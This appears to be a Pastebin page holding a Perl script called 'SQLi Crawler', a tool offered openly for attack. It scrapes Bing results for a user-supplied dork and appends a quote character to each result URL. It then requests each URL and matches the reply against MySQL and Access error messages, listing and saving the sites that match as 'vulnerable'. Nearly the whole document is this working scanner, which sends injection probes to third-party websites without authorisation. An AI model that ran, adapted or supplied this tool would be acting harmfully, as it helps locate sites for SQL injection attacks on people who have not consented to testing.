SHARE
TWEET

Untitled

a guest Aug 31st, 2011 652 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2.  
  3. use strict;
  4. use warnings;
  5. use HTTP::Request;
  6. use LWP::UserAgent;
  7.  
  8. ###############
  9. my $dork;
  10. my $url;
  11. my $i;
  12. my $request;
  13. my $useragent;
  14. my $response;
  15. my $start;
  16. my $end;
  17. my $result;
  18. my $fl;
  19. my $link;
  20. my $req;
  21. my $ua;
  22. my $result2;
  23. my $res;
  24. my $save;
  25. my $pages;
  26. my $page;
  27. my $choice;
  28. ##############
  29. my @z;
  30.  
  31. print q{
  32.      _ ____        _  
  33.     | |  _ \      | |  
  34.   __| | |_) | ___ | |_
  35.  / _` |  _ < / _ \| __|
  36. | (_| | |_) | (_) | |_
  37.  \__,_|____/ \___/ \__|
  38.                        
  39. ################################
  40. ##      / SQLi Crawler /      ##
  41. ##      Private Edition       ##
  42. ##      ~Coded by dbx~        ##
  43. ################################
  44.  
  45. };
  46.  
  47. MainMenu:
  48.  
  49. print "------------------------\n";
  50. print "Enter [1] To Begin SQLi.\n";
  51. print "Enter [2] To Exit.\n";
  52. print "------------------------\n\n";
  53. print "Your Choice: ";
  54.  
  55. chomp ($choice = <STDIN>);
  56. print "\n";
  57.  
  58. if ($choice eq 1) {&sql_scan}
  59. if ($choice eq 5) {die;}
  60.  
  61. sub sql_scan
  62. {
  63.  
  64. print "[+] Enter Bing! dork: ";
  65. chomp ($dork = <STDIN>);
  66. print "\n";
  67. print "[+] How Many Pages To Leech?: ";
  68. chomp ($pages = <STDIN>);
  69. print "\n";
  70.  
  71. $page = $pages.'1';
  72.  
  73. print "[~] Crawling...\n\n";
  74.  
  75. for ($i = 0; $i <= $page; $i=$i+11)
  76. {
  77.  
  78. $url = "http://www.bing.com/search?q=$dork&go=&qs=n&sk=&sc=8-13&first=$i";
  79.  
  80. $request = HTTP::Request->new(GET => $url);
  81. $useragent = LWP::UserAgent->new();
  82. $response = $useragent->request($request);
  83. $result = $response->content;
  84.  
  85. $start = '<h3><a href="';
  86. $end = '" onmousedown=';
  87.  
  88. while ($result =~ m/$start(.*?)$end/g)
  89.  
  90. {
  91.          $fl = $1;
  92.          $link = $fl."%27";
  93.          $req = HTTP::Request->new(GET => $link);
  94.          $ua = LWP::UserAgent->new();
  95.          $res = $ua->request($req);
  96.          $result2 = $res->content;
  97.  
  98.           if ($result2=~ m/You have an error in your SQL syntax/i || $result2=~ m/Query failed/i || $result2=~ m/SQL query failed/i || $result2=~ m/mysql_fetch_/i || $result2=~ m/mysql_fetch_array/i || $result2 =~ m/mysql_num_rows/i || $result2 =~ m/The used SELECT statements have a different number of columns/i )
  99.           {
  100.                 push @z, $link;
  101.                 print "[+] MySQL Vulnerable: $link\n\n";
  102.           }
  103.  
  104.           elsif ($result2 =~ m/Microsoft JET Database/i || $result2 =~ m/ODBC Microsoft Access Driver/i )
  105.           {
  106.                 push @z, $link;
  107.                 print "[+] MsSQL Vulnerable: $link\n\n";
  108.           }
  109.  
  110.           else {
  111.                
  112.                         print "[-] $link <- Not Vulnerable\n\n";
  113.           }
  114. }
  115.  
  116. }
  117.         print "Vulnerable Links:\n";
  118.         print "-----------------------------------\n";
  119. foreach (@z)
  120. {
  121.         print "$_ \n\n";
  122. }
  123. print "Save Into A Text File? (Y or N): ";
  124. chomp ($save = <STDIN>);
  125.  
  126. if ($save eq 'Y')
  127. {
  128.         print "Saving File...\n\n";
  129.         open(vuln_file, ">>Vulns.txt");
  130.         foreach (@z)
  131.         {
  132.                 print vuln_file "$_ \n";
  133.         }
  134.         close(vuln_file);
  135.         print "File Saved!\n\n";
  136. }
  137. goto MainMenu;
  138. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top